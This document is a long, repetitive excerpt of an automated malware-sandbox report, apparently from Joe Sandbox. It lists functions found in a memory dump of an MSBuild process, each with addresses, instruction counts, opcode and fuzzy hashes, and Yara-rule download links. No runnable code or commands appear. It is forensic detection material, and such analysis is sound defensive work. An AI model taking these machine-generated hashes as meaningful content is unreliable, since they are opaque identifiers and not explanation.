                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 936fb1674956bdcadd49c11e8b44a477ac5eea22c31f8bec32ab9c28f96be1dc
                                                                                                              • Instruction ID: 11d10643e136cdaac64a53ee2fbc7f578a1036b56b4b1c321e7bcf8e9044b2c8
                                                                                                              • Opcode Fuzzy Hash: 936fb1674956bdcadd49c11e8b44a477ac5eea22c31f8bec32ab9c28f96be1dc
                                                                                                              • Instruction Fuzzy Hash: 1501D4351422219FC73EAF398880DFABBBDFF91664B05842EE1455B251DB31EC51CB91
                                                                                                              Function 0110C020 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction ID: 22b3d7626b91dfbe81cf62e708a280a3b3cedb6ec2f8631bb4f3f39a6a18a7dd
                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                              • Instruction Fuzzy Hash: AC0145326007059FEF2BD6A9D800FA777EDFFD5214F018559E6868B980DBB0E402CB90
                                                                                                              Function 011520F0 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9e25f42e17db9aa850066191150236c750c3f359ec10002b7962dbfce102293e
                                                                                                              • Instruction ID: dcfd00263e98cad6a60ef4ce18cd9a9fe5abbbe481bcc8be5ff4bd7aa85b5aed
                                                                                                              • Opcode Fuzzy Hash: 9e25f42e17db9aa850066191150236c750c3f359ec10002b7962dbfce102293e
                                                                                                              • Instruction Fuzzy Hash: BC116D35A0020DEBCF19EF64D850BAE7BB5EF44244F004059ED1197250EB35AE11CB90
                                                                                                              Function 0114E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b4a6d495ceada51df15d38efe4832df2499a85f52c40020aacce8fe81c24541d
                                                                                                              • Instruction ID: f5231b7c2297eb33a3f5335667f295ecc8b532a7e07579c1f89f3d5f0bc9154d
                                                                                                              • Opcode Fuzzy Hash: b4a6d495ceada51df15d38efe4832df2499a85f52c40020aacce8fe81c24541d
                                                                                                              • Instruction Fuzzy Hash: 2001A7712115557FD319BB79CD40E57B7ACFF986687004625F10593551DB34EC21CAE0
                                                                                                              Function 011A69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8e23e1bc44ed99222cc44cb0a306386f9977222cfcebac5f98b8ea037950557a
                                                                                                              • Instruction ID: 713e0f429db431bd36cbf43b98332c8430746824bfde3654373957aa10df0d3a
                                                                                                              • Opcode Fuzzy Hash: 8e23e1bc44ed99222cc44cb0a306386f9977222cfcebac5f98b8ea037950557a
                                                                                                              • Instruction Fuzzy Hash: EF014C36224312DBC328DF79C848967BFA8FF88664F554229E968871D0E7309901C7D1
                                                                                                              Function 0119C460 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 391dbe32395967ea62a5edbd748032b9350e81d64be9ead51cc241e3352e4f88
                                                                                                              • Instruction ID: 326b7445a8cc4a9e0264c0909cc6ddeba758177c80462be730fe7d86dfe99f25
                                                                                                              • Opcode Fuzzy Hash: 391dbe32395967ea62a5edbd748032b9350e81d64be9ead51cc241e3352e4f88
                                                                                                              • Instruction Fuzzy Hash: 6F115775A0020DEBDF19EFA8C844EAE7BB5FB88254F004059FD6197380EB34EA51CB90
                                                                                                              Function 0119C97C Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 19a5b9f4edf585645b84a9ec163b8c5364a9232091d148d57f7072f364a717d9
                                                                                                              • Instruction ID: d312a155aa1a4f06ffe79336e00da8e799837725c418c43df8193299ce917677
                                                                                                              • Opcode Fuzzy Hash: 19a5b9f4edf585645b84a9ec163b8c5364a9232091d148d57f7072f364a717d9
                                                                                                              • Instruction Fuzzy Hash: 711139B16183099FC714DF69D441A5BBBE4EF98750F40451AF9A8D7391E730E900CBA2
                                                                                                              Function 0119CA11 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 299e079e02976e554fc43f739d99ac3c86e79685824ef17c43205eb40edbce7f
                                                                                                              • Instruction ID: 72a9eb2e82435c992bc5487f5e5c8db8b426a3b12542a9dcbeb68644411622e3
                                                                                                              • Opcode Fuzzy Hash: 299e079e02976e554fc43f739d99ac3c86e79685824ef17c43205eb40edbce7f
                                                                                                              • Instruction Fuzzy Hash: 251179B1A183089FC714DF69D441A4BBBE4FF99350F00851AF9A8D73A1E734E900CB92
                                                                                                              Function 011E4A80 Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                              • Instruction ID: c7b80185fa68f0ca4514f8fd2586ab443b323eb9f04462fe29d39dbf98e5b26f
                                                                                                              • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                              • Instruction Fuzzy Hash: AA01D836200A059FDB299BADD848F56B7E6FBC5624F444419E643CBA90DB70F890C794
                                                                                                              Function 0112E016 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction ID: 812310eba5b886bf0852db1d0ba0c527287032225c52b4c992afd04c26b85a74
                                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                              • Instruction Fuzzy Hash: AF017C323056949FE32A872DC948F2A7BDCEB44754F0904A1F905CB6A1D73DDC51C626
                                                                                                              Function 0110826B Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5c786082f9422421dda7bed0bdb8abffd2250075febb10d84602cc950bc0e565
                                                                                                              • Instruction ID: 6d1a41bdc7ba3c5db41e0b7d4b75a9d3d5cf53104c04942f9063d2085a05324c
                                                                                                              • Opcode Fuzzy Hash: 5c786082f9422421dda7bed0bdb8abffd2250075febb10d84602cc950bc0e565
                                                                                                              • Instruction Fuzzy Hash: 4601D435F14905EFCB1DEB69D8049AABBB9FF80224B154029DA0197680DF70D941C291
                                                                                                              Function 011BEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 317635a20bb43217620b3e7bb8fa126b80ab9abbdfc1b0099734b5869813af12
                                                                                                              • Instruction ID: 489047e6d0395759cc5685daab9de8a339939631d8bd87c86c1827bc1bf68d16
                                                                                                              • Opcode Fuzzy Hash: 317635a20bb43217620b3e7bb8fa126b80ab9abbdfc1b0099734b5869813af12
                                                                                                              • Instruction Fuzzy Hash: DF01F271241B11AFD33A9B1AD980F86BAA8EF54B50F01442EF3069F3A1D7B0D850CB54
                                                                                                              Function 01112582 Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b7f26fee8d01fc50a6490a4f73c754c7d56d1300f07d18b858dc54fc6fe8848
                                                                                                              • Instruction ID: 0868edf5326991723bcfbc4c26712e58e1ca4316581b480a61d5b274faf7db95
                                                                                                              • Opcode Fuzzy Hash: 2b7f26fee8d01fc50a6490a4f73c754c7d56d1300f07d18b858dc54fc6fe8848
                                                                                                              • Instruction Fuzzy Hash: 04F0F932641625B7C7399F568C80F5BBAAEEB94BA0F114029E60597640D730ED01CAA0
                                                                                                              Function 0113C073 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction ID: 74a6280c94be676a5b1d1d8f26d88a6578f832f54bb713cacc95254319b683ea
                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction Fuzzy Hash: FBF0AFB2600625ABD328CF4DD840E67FBEADBD1A84F048129A515DB220EA31DD04CB90
                                                                                                              Function 0110C310 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction ID: 00ee3b3d70b1860273652ae4525646b538afe38fb8eb5570914799ad1ef27cf7
                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction Fuzzy Hash: 1CF0CD339185329BD73F16594440B67F7558FE5A64F160275E2055F180CFE4CD015AD1
                                                                                                              Function 011E634F Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0ff1043684f7583a34fa980e3f516054c33c339a1eb735b692fed3027dccbe2c
                                                                                                              • Instruction ID: 9c31c4d90243ba6331f760fc7fb2bf1a4f65fcb19f3d1d179acf432594589237
                                                                                                              • Opcode Fuzzy Hash: 0ff1043684f7583a34fa980e3f516054c33c339a1eb735b692fed3027dccbe2c
                                                                                                              • Instruction Fuzzy Hash: 56017C71E10209EBCB08DFA9E444AAEB7F8FF58304F50402AE914E7351D7349A00CBA0
                                                                                                              Function 011E625D Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17bb23f6e8aeb4a68dfe398a89ec409ac9dbc27b1558e88988e2d6f201475cc7
                                                                                                              • Instruction ID: 2a3bf4506e728d758f1e936a6a2cf4df928b5086b52ce7794cb695372ae5572b
                                                                                                              • Opcode Fuzzy Hash: 17bb23f6e8aeb4a68dfe398a89ec409ac9dbc27b1558e88988e2d6f201475cc7
                                                                                                              • Instruction Fuzzy Hash: DA017C71A1020AEBCB08DFA9D445AAEB7F8EF58304F50402AF910E7351D774AA00CBA0
                                                                                                              Function 011E62D6 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ef514dd256bff5eff60d2394f885f5347884338524c5e8acb4dd7112a32c74f4
                                                                                                              • Instruction ID: ca47cd51fc206e9b630ce454c0bb0e1af839e0d50aa0c8b2e5ce2d7ca9790c38
                                                                                                              • Opcode Fuzzy Hash: ef514dd256bff5eff60d2394f885f5347884338524c5e8acb4dd7112a32c74f4
                                                                                                              • Instruction Fuzzy Hash: 8E012171A10209EBDB08DFA9D44599EB7F8EF58714F50405AE914E7351D7749A01CBA0
                                                                                                              Function 0114CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction ID: 34ace6a24f02e48874ad194836790135438bcfad098014833edbed0e20d439aa
                                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction Fuzzy Hash: AB012832201685DBE33EE71DC805F99BFD8EF41B54F5984A5FA148F6A2E778C840C661
                                                                                                              Function 011E61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8ce93f781d8408aaed3b3ec44c2bdf10db01e49bcd790f505db35b8ef27132c6
                                                                                                              • Instruction ID: 1288bcc9bb32d5e8ed0681a20fc8c229b997ec7feb3ddf3f4a43ad704bea7599
                                                                                                              • Opcode Fuzzy Hash: 8ce93f781d8408aaed3b3ec44c2bdf10db01e49bcd790f505db35b8ef27132c6
                                                                                                              • Instruction Fuzzy Hash: E9018F71A1024ADBCB08DFA9D445AEEBBF8BF58314F54005AE900A7280D734EA01CB94
                                                                                                              Function 011963C0 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction ID: 75c06e0a32b916c8280a8fadf4eb8aebf53fe7acb276b6e2e67e1fced42b749c
                                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction Fuzzy Hash: 7AF0F97220001DBFEF069F94DD80DAF7B7EEB592A8B114125FA1196160D735DE21EBA0
                                                                                                              Function 0119A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b97bc21cfd4990f6acb5f7ed33ce962d30d21fd74b77f2d90b11c757cc20ff56
                                                                                                              • Instruction ID: ec3fbbc18992e1b6e6bf03a3e0744282430213798be2185e6803a520b9803c36
                                                                                                              • Opcode Fuzzy Hash: b97bc21cfd4990f6acb5f7ed33ce962d30d21fd74b77f2d90b11c757cc20ff56
                                                                                                              • Instruction Fuzzy Hash: AA018936200109ABDF129E84E844EDA7F66FF4C764F068201FE2966220C332D970EF81
                                                                                                              Function 0110C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5b299cbaed6a41aa9830d521043c5eaf34ba9ba70c5cbf9cd86efa60f3ec3e6f
                                                                                                              • Instruction ID: 36de0826128aaddd2044af0646d4c54a1ffcf56a4b223eb5146f2cf919596a25
                                                                                                              • Opcode Fuzzy Hash: 5b299cbaed6a41aa9830d521043c5eaf34ba9ba70c5cbf9cd86efa60f3ec3e6f
                                                                                                              • Instruction Fuzzy Hash: C4F02472A04341DFF31E961ADC01F22329AE7D0750F2681AAEB058B2C1EBF1DC018BD5
                                                                                                              Function 0114656A Relevance: .0, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5cfd16d9dee5e1bd5b3f583b2e4e304d23eee0d0178f43e5b0edb44300501f63
                                                                                                              • Instruction ID: ab1680c18b1ee94b5c1722dbc655e74cc77c2793f1632b50dcebcdd311576d4c
                                                                                                              • Opcode Fuzzy Hash: 5cfd16d9dee5e1bd5b3f583b2e4e304d23eee0d0178f43e5b0edb44300501f63
                                                                                                              • Instruction Fuzzy Hash: A701A470204B86DBF33EA72CDD48B2937A8BB45F48F494190FA118FAD6DB28D841CA11
                                                                                                              Function 011B437C Relevance: .0, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction ID: 690dfb6a5e9b1780152f3454165355e3fab13bce23a5422bd120584b6b37939c
                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction Fuzzy Hash: 89F0B43134AF3347E77DAA2E8490A6AA6569F90D40B0D852CD642CBAA2DF20D8008784
                                                                                                              Function 0119E872 Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction ID: bf3b58000f3385466dfea11c97bca54e2022994c49ad187471db017c38959c4d
                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction Fuzzy Hash: 1EF089337525219BDB39DE8DDC80F16B768FFD9A60F1A0065A6249F660C760EC12C7D0
                                                                                                              Function 0119C89D Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c2df73068553f0592ead6adeb11ffd5814e966140c46bec797d52e48244905aa
                                                                                                              • Instruction ID: fe223a10f9a9bf9530892cc50a3296e53fd335578148881840bfd28a02f06672
                                                                                                              • Opcode Fuzzy Hash: c2df73068553f0592ead6adeb11ffd5814e966140c46bec797d52e48244905aa
                                                                                                              • Instruction Fuzzy Hash: 10F08C706153049FC728EF28C445A1AB7E4EF98714F80465AB8A8DB395E734EA01CB96
                                                                                                              Function 01140854 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction ID: 042c5150288aaa81815e7ecf2bda69c9144a9f6caa9be03631bc7fddb25973fc
                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction Fuzzy Hash: 5CF02472A00205AFE318DF22CD00F96B6E9EF9C704F158078A644C71A0FBB0DD40CB54
                                                                                                              Function 0119C912 Relevance: .0, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb032f31491a753e3fdb2fa7c80c6a6093007294aa69eee767e3d7df25f13068
                                                                                                              • Instruction ID: dd98f502de9b942dfbb389497e069ffdf6f303613537c7b45a248f8f8a85ad6c
                                                                                                              • Opcode Fuzzy Hash: fb032f31491a753e3fdb2fa7c80c6a6093007294aa69eee767e3d7df25f13068
                                                                                                              • Instruction Fuzzy Hash: B0F0AF70A00249DFCB18EF69C515A5EB7B4EF18304F008055A865EB385EB38EA01CB90
                                                                                                              Function 011147FB Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bd50f6d224ce287f6e5c52c76d059a2202f69b2e721d2d58c11cb8247dad2c60
